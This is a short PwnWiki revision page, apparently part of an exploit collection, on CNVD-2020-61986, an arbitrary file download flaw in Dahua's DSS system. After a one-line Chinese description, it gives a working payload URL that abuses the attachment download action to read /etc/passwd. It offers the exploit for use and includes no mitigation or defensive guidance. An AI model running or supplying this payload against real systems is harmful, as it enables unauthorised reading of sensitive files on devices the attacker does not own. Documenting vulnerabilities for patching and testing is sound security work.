Difference between revisions of "CNVD-2020-61986 大華DSS系統任意文件下載漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞簡介== 浙江大華技術股份有限公司DSS存在任意文件下載漏洞,攻擊者可利用該漏洞登錄界面下載任意文件...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞簡介== | + | ==漏洞簡介== <!--T:1--> |
| + | <!--T:2--> | ||
浙江大華技術股份有限公司DSS存在任意文件下載漏洞,攻擊者可利用該漏洞登錄界面下載任意文件獲取敏感信息。 | 浙江大華技術股份有限公司DSS存在任意文件下載漏洞,攻擊者可利用該漏洞登錄界面下載任意文件獲取敏感信息。 | ||
</translate> | </translate> | ||
Latest revision as of 20:44, 12 June 2021
漏洞簡介
浙江大華技術股份有限公司DSS存在任意文件下載漏洞,攻擊者可利用該漏洞登錄界面下載任意文件獲取敏感信息。
Payload
http://ip/itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
